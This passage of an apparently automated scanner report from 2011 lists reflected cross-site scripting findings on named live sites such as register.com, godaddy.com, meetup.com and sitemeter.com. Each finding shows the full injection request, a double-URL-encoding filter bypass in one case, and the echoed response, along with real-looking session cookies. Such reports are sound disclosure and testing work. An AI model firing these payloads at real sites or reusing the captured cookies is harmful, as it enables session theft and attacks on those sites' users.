F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/

Response

HTTP/1.1 200 OK
Content-Length: 190
Date: Sat, 03 Sep 2011 14:45:51 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: eventdcde1<img src=a onerror=alert(1)>f66f189a6f5', 0).setOffer(new mboxOfferDefault()).loaded();}

4.4. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mboxId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload f1e2b<script>alert(1)</script>3ebb60b60ec was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1315061061832-261883&mboxPC=1313976253453-233900.19&mboxPage=1315061061832-261883&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=513&browserTimeOffset=-300&colorDepth=16&mboxCount=9&mbox=SiteCatalyst%3A%20event&mboxId=0f1e2b<script>alert(1)</script>3ebb60b60ec&mboxTime=1315043077971&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.7&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&eVar17=8%3A30AM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/

Response

HTTP/1.1 200 OK
Content-Length: 187
Date: Sat, 03 Sep 2011 14:45:53 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event', 0f1e2b<script>alert(1)</script>3ebb60b60ec).setOffer(new mboxOfferDefault()).loaded();}

4.5. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://registercom.tt.omtrdc.net
Path:   /m2/registercom/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload ba731<img%20src%3da%20onerror%3dalert(1)>a045854fac4 was submitted in the mbox parameter. This input was echoed as ba731<img src=a onerror=alert(1)>a045854fac4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/registercom/sc/standard?mboxHost=www.register.com&mboxSession=1315085400638-452340&mboxPage=1315085400638-452340&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxCount=11&mbox=SiteCatalyst%3A%20eventba731<img%20src%3da%20onerror%3dalert(1)>a045854fac4&mboxId=0&mboxTime=1315067414617&charSet=ISO-8859-1&visitorNamespace=registercom&pageName=TTN%3A%20Home&currencyCode=USD&channel=TTN%3A%20Home&server=www.register.com&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls&linkInternalFilters=javascript%3A%2Crodopi%2Cregister&linkTrackVars=None&linkTrackEvents=None&prop6=Unknown&eVar6=Unknown&prop11=Unknown%3A%20TTN%3A%20Home&mboxURL=http%3A%2F%2Fwww.register.com%2F&mboxReferrer=&mboxVersion=39&scPluginVersion=1 HTTP/1.1
Host: registercom.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 264
Date: Sat, 03 Sep 2011 21:36:20 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1315085400638-452340.19");mboxFactories.get('default').get('SiteCatalyst: eventba731<img src=a onerror=alert(1)>a045854fac4', 0).setOffer(new mboxOfferDefault()).loaded();}

4.6. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard [mboxId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://registercom.tt.omtrdc.net
Path:   /m2/registercom/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload 91a71<script>alert(1)</script>a4eda9bdaf was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/registercom/sc/standard?mboxHost=www.register.com&mboxSession=1315085400638-452340&mboxPage=1315085400638-452340&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxCount=11&mbox=SiteCatalyst%3A%20event&mboxId=091a71<script>alert(1)</script>a4eda9bdaf&mboxTime=1315067414617&charSet=ISO-8859-1&visitorNamespace=registercom&pageName=TTN%3A%20Home&currencyCode=USD&channel=TTN%3A%20Home&server=www.register.com&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls&linkInternalFilters=javascript%3A%2Crodopi%2Cregister&linkTrackVars=None&linkTrackEvents=None&prop6=Unknown&eVar6=Unknown&prop11=Unknown%3A%20TTN%3A%20Home&mboxURL=http%3A%2F%2Fwww.register.com%2F&mboxReferrer=&mboxVersion=39&scPluginVersion=1 HTTP/1.1
Host: registercom.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 260
Date: Sat, 03 Sep 2011 21:36:30 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1315085400638-452340.19");mboxFactories.get('default').get('SiteCatalyst: event', 091a71<script>alert(1)</script>a4eda9bdaf).setOffer(new mboxOfferDefault()).loaded();}

4.7. http://s29.sitemeter.com/js/counter.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s29.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d44ca'%3balert(1)//d4128f40f21 was submitted in the site parameter. This input was echoed as d44ca';alert(1)//d4128f40f21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.asp?site=s29fjgruberd44ca'%3balert(1)//d4128f40f21 HTTP/1.1
Host: s29.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:17:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7318
Content-Type: application/x-javascript
Expires: Sat, 03 Sep 2011 13:27:13 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s29fjgruberd44ca';alert(1)//d4128f40f21', 's29.sitemeter.com', '');

var g_sLastCodeName = 's29fjgruberd44ca';alert(1)//d4128f40f21';
// ]]>
...[SNIP]...

4.8. http://s29.sitemeter.com/js/counter.js [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s29.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 880a1'%3balert(1)//032b9cc3e90 was submitted in the site parameter. This input was echoed as 880a1';alert(1)//032b9cc3e90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js?site=s29fjgruber880a1'%3balert(1)//032b9cc3e90 HTTP/1.1
Host: s29.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:17:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7318
Content-Type: application/x-javascript
Expires: Sat, 03 Sep 2011 13:27:13 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s29fjgruber880a1';alert(1)//032b9cc3e90', 's29.sitemeter.com', '');

var g_sLastCodeName = 's29fjgruber880a1';alert(1)//032b9cc3e90';
// ]]>
...[SNIP]...

4.9. http://www.godaddy.com/external/json/PcSetData.aspx [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /external/json/PcSetData.aspx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c5f83<script>alert(1)</script>ad6c14f1643 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /external/json/PcSetData.aspx?ci=17368&callback=pcj_setdatac5f83<script>alert(1)</script>ad6c14f1643&pcj_setdata=jsonp1315085571645&_=1315085571848 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; domainYardVal=%2D1; serverVersion=A; traffic=referringdomain=&referringpath=8d587be0%2D834e%2D4a03%2D83dc%2D2f3bcb783a40&shopper=46215684&querystring=ci%3D42031%26config%3Dssldefault&server=M1PWCORPWEB109&isc=&privatelabelid=1&page=%2Fgdshop%2Foffers%2Fcross%5Fsell%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2Fssl%2Fssl%2Dcertificates%2Easpx%3Fci%3D8346&cookies=1; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=3&fMajorVer=10&slMajorVer=-1&slMinorVer=-1

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Content-Type: text/javascript; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:47:19 GMT
Content-Length: 71

pcj_setdatac5f83<script>alert(1)</script>ad6c14f1643({"Error":"Error"})

4.10. http://www.meetup.com/api/ [method parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.meetup.com
Path:   /api/

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 94cc7<img%20src%3da%20onerror%3dalert(1)>74359147cc3 was submitted in the method parameter. This input was echoed as 94cc7<img src=a onerror=alert(1)>74359147cc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/?method=getAlertTopicStats94cc7<img%20src%3da%20onerror%3dalert(1)>74359147cc3&arg_topicId=381&arg_lat=42.37&arg_lon=-71.09&arg_radius=50&arg_zip=02142&arg_country=us&arg_language=en_US HTTP/1.1
Host: www.meetup.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MEETUP_MEMBER=id=0&status=1&timestamp=1315055493&bs=0&tz=US%2FEastern&zip=&country=us&city=&state=&lat=0.0&lon=0.0&domain=&dc=&s=88f912a4b3d9f96f4f99f1d5b0e82fe99809932d; MEETUP_AFFIL=affil=meetup&ref=microsoftcambridge.com/events/bostonbizsparkmeetupseptember2011/tabid/879; MEETUP_LANGUAGE=language=en&country=US; MEETUP_GA=id%3D0%26segment%3Dalien; __utma=19434532.1405489551.1315055535.1315055535.1315055535.1; __utmb=19434532.4.10.1315055535; __utmc=19434532; __utmz=19434532.1315055535.1.1.utmcsr=microsoftcambridge.com|utmccn=(referral)|utmcmd=referral|utmcct=/Events/BostonBizSparkMeetupSeptember2011/tabid/879/Default.aspx; __utmv=19434532.id%3D0%26segment%3Dalien

Response

HTTP/1.1 403 Forbidden
Date: Sat, 03 Sep 2011 13:11:49 GMT
Server: Apache-Coyote/1.1
Expires: 0
X-Meetup-server: app16.int.meetup.com
Content-Type: application/json;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 112
Connection: close

{"UNKNOWN":"[BAD METHOD] Can't find method \"getAlertTopicStats94cc7<img src=a onerror=alert(1)>74359147cc3\"."}

4.11. http://www.microcad.ca/cart/add/ [productid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.microcad.ca
Path:   /cart/add/

Issue detail

The value of the productid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 36039%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6607268138f was submitted in the productid parameter. This input was echoed as 36039'><script>alert(1)</script>6607268138f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the productid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /cart/add/ HTTP/1.1
Host: www.microcad.ca
Proxy-Connection: keep-alive
Referer: http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760?utm_source=google&utm_medium=product-search
Content-Length: 31
Cache-Control: max-age=0
Origin: http://www.microcad.ca
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: public=mrff84dil681s0lpbfousev6i6; __utma=84250501.1276542809.1315085415.1315085415.1315085415.1; __utmb=84250501.1.10.1315085415; __utmc=84250501; __utmz=84250501.1315085415.1.1.utmcsr=google|utmccn=(not%20set)|utmcmd=product-search|utmctr=ssl%20certificates; mf_user=1; mf_session=bc76099c1b4cf7981cbda530d0e66b84; mf_lastpageview=1315085419325

quantity=1&productid=101195676036039%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6607268138f

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 18701
Content-Type: text/html
ACCEPT-RANGES: none

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Microcad.ca | Sho
...[SNIP]...
<a href='/cart/remove/101195676036039'><script>alert(1)</script>6607268138f'>
...[SNIP]...

4.12. http://www.register.com/css/home-optimized.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /css/home-optimized.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59ae9"%3balert(1)//903e1a040cb was submitted in the REST URL parameter 1. This input was echoed as 59ae9";alert(1)//903e1a040cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css59ae9"%3balert(1)//903e1a040cb/home-optimized.css;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:34:56 GMT
HostName: atleuapp01.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22792
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/css59ae9";alert(1)//903e1a040cb/home-optimized.css",width:400,height:400 }
</script>
...[SNIP]...

4.13. http://www.register.com/domain/searchresults.rcmx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /domain/searchresults.rcmx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e87eb"%3balert(1)//6208eb93c15 was submitted in the REST URL parameter 1. This input was echoed as e87eb";alert(1)//6208eb93c15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domaine87eb"%3balert(1)//6208eb93c15/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0 HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 22:14:06 GMT
HostName: atleuapp04.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22798
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/domaine87eb";alert(1)//6208eb93c15/searchresults.rcmx",width:400,height:400 }
</script>
...[SNIP]...

4.14. http://www.register.com/domain/searchresults.rcmx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /domain/searchresults.rcmx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c08de"%3balert(1)//874342fb6c6 was submitted in the REST URL parameter 2. This input was echoed as c08de";alert(1)//874342fb6c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/searchresults.rcmxc08de"%3balert(1)//874342fb6c6?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0 HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
